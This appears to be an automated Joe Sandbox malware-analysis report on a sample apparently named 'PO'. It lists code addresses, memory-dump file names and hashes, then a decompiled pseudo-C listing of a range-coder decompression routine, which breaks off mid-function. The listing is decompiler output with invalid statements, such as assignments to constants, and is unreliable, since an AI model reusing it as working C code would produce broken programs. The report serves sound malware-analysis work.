0x00406acf
0x00406ad1
0x00406aa9
0x00406aa9
0x00406ab1
0x00406ab6
0x00406ab8
0x00406aba
0x00406aba
0x00406ad4
0x00406adb
0x00406ade
0x00000000
0x00406ae0
0x00000000
0x00406ae0
0x00000000
0x00406d6d
0x00406d6d
0x00406d71
0x00407098
0x00000000
0x00407098
0x00406d77
0x00406d7a
0x00406d7d
0x00406d81
0x00406d84
0x00406d8a
0x00406d8c
0x00406d8c
0x00406d8c
0x00406d8f
0x00000000
0x00000000
0x00406b3d
0x00406b3d
0x00406b40
0x00406eb2
0x00406eb2
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f39
0x00406f3d
0x00406f5b
0x00406f5b
0x00406f5b
0x00406f62
0x00406f69
0x00000000
0x00406f69
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4f
0x00000000
0x00000000
0x0040702a
0x0040702d
0x00406f2e
0x00406f2e
0x00000000
0x00000000
0x00406c64
0x00406c66
0x00406c6d
0x00406c6e
0x00406c70
0x00406c73
0x00000000
0x00000000
0x00406c7b
0x00406c7e
0x00406c81
0x00406c83
0x00406c85
0x00406c85
0x00406c86
0x00406c89
0x00406c90
0x00406c93
0x00406ca1
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f86
0x00406f86
0x00406f8a
0x004070c2
0x00000000
0x004070c2
0x00406f90
0x00406f93
0x00406f96
0x00406f9a
0x00406f9d
0x00406fa3
0x00406fa5
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fab
0x00406fab
0x00406fab
0x00406fab
0x00000000
0x00000000
0x00406ca9
0x00406cac
0x00406ce2
0x00406e12
0x00406e12
0x00406e12
0x00406e12
0x00406e15
0x00406e15
0x00406e18
0x00406e1a
0x004070a4
0x00000000
0x004070a4
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2d
0x00406e30
0x00406e30
0x00406e30
0x00000000
0x00406e30
0x00406cae
0x00406cb0
0x00406cb2
0x00406cb4
0x00406cb7
0x00406cb8
0x00406cba
0x00406cbc
0x00406cbf
0x00406cc2
0x00406cd8
0x00406cdd
0x00406d15
0x00406d15
0x00406d19
0x00406d45
0x00406d47
0x00406d4e
0x00406d51
0x00406d54
0x00406d54
0x00406d59
0x00406d59
0x00406d5b
0x00406d5e
0x00406d65
0x00406d68
0x00406d95
0x00406d95
0x00406d98
0x00406d9b
0x00406e0f
0x00406e0f
0x00406e0f
0x00000000
0x00406e0f
0x00406d9d
0x00406da3
0x00406da6
0x00406da9
0x00406dac
0x00406daf
0x00406db2
0x00406db5
0x00406db8
0x00406dbb
0x00406dbe
0x00406dd7
0x00406dd9
0x00406ddc
0x00406ddd
0x00406de0
0x00406de2
0x00406de5
0x00406de7
0x00406de9
0x00406dec
0x00406dee
0x00406df1
0x00406df5
0x00406df7
0x00406df7
0x00406df8
0x00406dfb
0x00406dfe
0x00406dc0
0x00406dc0
0x00406dc8
0x00406dcd
0x00406dcf
0x00406dd2
0x00406dd2
0x00406e01
0x00406e08
0x00406d92
0x00406d92
0x00406d92
0x00406d92
0x00000000
0x00406e0a
0x00000000
0x00406e0a
0x00406e08
0x00406d1b
0x00406d1e
0x00406d20
0x00406d23
0x00406d26
0x00406d29
0x00406d2b
0x00406d2e
0x00406d31
0x00406d31
0x00406d34
0x00406d34
0x00406d37
0x00406d3e
0x00406d12
0x00406d12
0x00406d12
0x00406d12
0x00000000
0x00406d40
0x00000000
0x00406d40
0x00406d3e
0x00406cc4
0x00406cc7
0x00406cc9
0x00406ccc
0x00000000
0x00000000
0x00406a2b
0x00406a2b
0x00406a2f
0x00407074
0x00000000
0x00407074
0x00406a35
0x00406a38
0x00406a3b
0x00406a3e
0x00406a41
0x00406a44
0x00406a47
0x00406a49
0x00406a4c
0x00406a4f
0x00406a52
0x00406a54
0x00406a54
0x00406a54
0x00000000
0x00000000
0x00406bb6
0x00406bb6
0x00406bba
0x00407080
0x00000000
0x00407080
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bcb
0x00406bcb
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd4
0x00406bd7
0x00406bda
0x00406bdd
0x00406bde
0x00406be0
0x00406be0
0x00406be0
0x00406be3
0x00406be6
0x00406be9
0x00406bec
0x00406bec
0x00406bec
0x00406bef
0x00406bf1
0x00406bf1
0x00000000
0x00000000
0x00406e33
0x00406e33
0x00406e33
0x00406e37
0x00000000
0x00000000
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e48
0x00406e48
0x00406e48
0x00406e4b
0x00406e4e
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5b
0x00406e5d
0x00406e5d
0x00406e5d
0x00406e60
0x00406e63
0x00406e66
0x00406e69
0x00406e6c
0x00406e70
0x00406e72
0x00406e75
0x00000000
0x00406e77
0x00406bf4
0x00406bf4
0x00000000
0x00406bf4
0x00406e75
0x004070aa
0x004070cc
0x004070d2
0x004070d4
0x004070db
0x004070dd
0x004070e4
0x004070e8
0x00000000
0x004066d9
0x004070e1
0x004070e1
0x00000000
0x004070e1
0x00406f2e
0x00406fb4
0x00406fba
0x00406fbd
0x00406fc0
0x00406fc3
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fcf
0x00406fd5
0x00406fee
0x00406ff1
0x00406ff4
0x00406ff7
0x00406ffb
0x00406ffd
0x00406ffe
0x00407001
0x00406fd7
0x00406fd7
0x00406fdf
0x00406fe4
0x00406fe6
0x00406fe9
0x00406fe9
0x0040700b
0x00000000
0x0040700d
0x00000000
0x0040700d
0x0040700b
0x00000000
0x00406e80

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6b96a49f958b7a8d2aa4cc917083ea926a28b83a61870a924df7985f049b653
Instruction ID: dd225a6952a4a1885b566de7f95e3528e0c965b1b64db9b9769652e5c735704b
Opcode Fuzzy Hash: e6b96a49f958b7a8d2aa4cc917083ea926a28b83a61870a924df7985f049b653
Instruction Fuzzy Hash: 3D913370D04229CBDF28CFA8C844BADBBB1FF44305F15816AD856BB291C7789A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406B92 Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406B92() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004070E9))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
